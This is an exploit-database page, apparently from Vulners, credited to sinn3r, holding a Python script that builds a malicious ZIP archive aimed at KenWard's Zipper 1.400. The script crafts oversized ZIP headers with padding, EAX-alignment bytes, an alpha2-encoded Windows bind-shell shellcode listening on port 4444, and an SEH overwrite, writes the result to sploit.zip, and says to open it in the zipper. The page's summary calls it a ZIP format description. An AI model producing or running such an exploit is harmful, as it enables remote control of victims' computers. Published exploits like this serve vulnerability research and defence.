Lucene search
K

KenWards-Zipper-1.400

🗓️ 07 Jan 2015 13:59:34Reported by sinn3rType 
exploitpack
 exploitpack
👁 19 Views

This document provides a detailed description of the KenWards-Zipper-1.400 zip file format, including local file headers, central directory file headers, and the end of central directory record, as well as the creation of the ZIP structure with a payload

Code
## Zip file format based on:
## http://en.wikipedia.org/wiki/ZIP_(file_format)
local_file_header = (
"\x50\x4B\x03\x04"  #Local file header signature
"\x00\x02"      #Version needed to extract
"\x00\x08"      #General purpose bit flag
"\x00\xDA"      #Compression method
"\xA2\x48"      #File last modification time
"\x3B\xF6"      #File last modification date
"\x66\x18\x0D\x4E"  #CRC-32
"\xEF\x0F\x00\x00"  #Compressed size (payload size)
"\x14\x00\x00\x00"  #Uncompressed size
"\xe4\x4f"      #File name length
"\x04\x00"      #Extra field length
#"\x73\x65\x63\x72\x65\x74\x73" #File name (n) ASCII "secrets"
#"\x42\x42\x42\x42" #Extra field (m)
);
 
central_directory_file_header = (
"\x50\x4b\x01\x02"  #Central directory file header signature
"\x14\x00"      #Version made by
"\x14\x00"      #Version needed to extract
"\x00\x08"      #General purpose bit flag
"\x00\xDA"      #Compression method
"\xA2\x48"      #File last modification time
"\x3B\xF6"      #File last modification date
"\x66\x18\x0D\x4E"  #CRC-32
"\xE4\x0F\x00\x00"  #Compressed size (payload size)
"\x14\x00\x00\x00"  #Uncompressed size
"\xe4\x0f"      #File name length (n)
"\x04\x00"      #Extra field length (m)
"\x04\x00"      #File comment length
"\x00\x01"      #Disk number where file starts
"\x00\x00"      #Internal file attributes
"\x20\x00\x00\x00"  #External file attributes
"\x00\x00\x00\x00"  #Relative offset of local file header
#"\x73\x65\x63\x72\x65\x74\x73" #File name (n) ASCII "secrets"
#"\x42\x42\x42\x42" #Extra field (m)
#"\x43\x43\x43\x43" #File comment (k)
);
 
end_of_central_directory_record = (
"\x50\x4B\x05\x06"  #End of central directory signature
"\x00\x00"      #Number of this disk
"\x00\x00"      #Disk where central directory starts
"\x01\x00"      #Number of central directory records on this disk
"\x01\x00"      #Total number of central directory records
"\x12\x10\x00\x00"  #Size of central directory (central directory size + payload)
"\x02\x10\x00\x00"  #Offset of start of central directory, relative to start of archive (lfh + payload)
"\x00\x00"      #Zip file comment length (n)
);
 
 
## Align EAX for the base address of the alpha2 encoded bindshell
alignEAX = (
"\x05\x10\x7E\x10\x7E"  #ADD EAX, 0x7E107E10
"\x05\x09\x75\x01\x7E"  #ADD EAX, 0x7E017509
"\x05\x02\x03\x01\x04"  #ADD EAX, 0x04010302
"\x72\x07"+     #JB jump over the bytes we can't overwrite
"\x41"*12       #NOPs
);
 
## windows/shell_bind_tcp lport=4444 exitfunc=seh
## alpha2 eax --uppercase   744 bytes
shellcode = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS03PK"
"9ZE6QN2CTLK0RVPLKPR4LLKQBTTLKSBVH4ONWQZVFFQKOFQO0NLGL3QSL4BVLQ0YQXO4MUQIWKRJPF2QGLKPRB0"
"LKPBGLEQ8PLK70RXMUO0BTQZEQHPPPLK78TXLK687PS1XSM37LPILKWDLKUQ8V6QKO6QYPNL9Q8OTMEQ9WFXKPT"
"5ZT33SMJX7KCM14CEZB1HLKPXWTUQN3SVLKTLPKLKV85LEQXSLK34LKS1HPK9W47TQ4QK1KSQQI0Z0QKOM0PXQO"
"QJLKTRJKK61MSXVS02EP5PCXBW3CFRQOF4SXPLT77VDGKO9EX8LPS1UPS0WYO4F4PP3X7YMP2KS0KOHUV00P0P6"
"0QPV01PPPRHJJTOIOKPKON5MYO7FQYK0SSXS2S0TQQLMYKVSZB0PVPW3XO2YK7GCWKO8UPSPWE8X7KYWHKOKOHU"
"QCV3PWSX2TJLGKKQKON5V7MYHG58BU2N0M3QKON52HRCBM54UPMYKS0W67676QL62JTRPYPVKRKMSVO774WTWLU"
"QUQLM0DGTB0O65PPD0TV0PV0V0VQVPVPNPV1FQC66SXT9XLWOLFKOYEK9M0PNV6QVKOFPCXUXK75MSPKON5OKKN"
"TNP2ZJBHY6LUOMMMKON5WLUV3L5ZK0KKKPRUC5OKW74S2R2ORJ5PPSKO8UUZA")
 
## 4064+4 bytes
## Pointer to next SEH record: 1022 bytes
## SE handler                : 1026 bytes
payload = (
"\x41"*(1017-len(alignEAX)-len(shellcode))+ #Padding
alignEAX+                   #Align EAX for the bindshell
shellcode+                  #Bindshell lport 4444
"\x82\x85\x81\x98\x98"              #This will get mangled and become "\xE9\xE0\xFC\xFF\xFF"
"\x73\x97\x42\x42"              #JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes
"\x7E\x27\x41\x00"+             #POP POP RET = 0x0041277E
"\x44"*3034+                    #Padding
".bin"                      #Fake name
);
 
## Create the ZIP structure with our payload
zip = (
local_file_header +
payload +
central_directory_file_header +
payload +
end_of_central_directory_record
);
 
f = open("sploit.zip", "w")
f.write(zip)
f.close()
 
print "[*] Local file header size = 0x%x" %len(local_file_header)
print "[*] Central directory file header size = 0x%x" %len(central_directory_file_header)
print "[*] End of central directory record size = 0x%x" %len(end_of_central_directory_record)
print "[*] Payload size = %s bytes" %len(payload)
print "[*] sploit.zip created.  Open it with KenWard's Zipper."

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation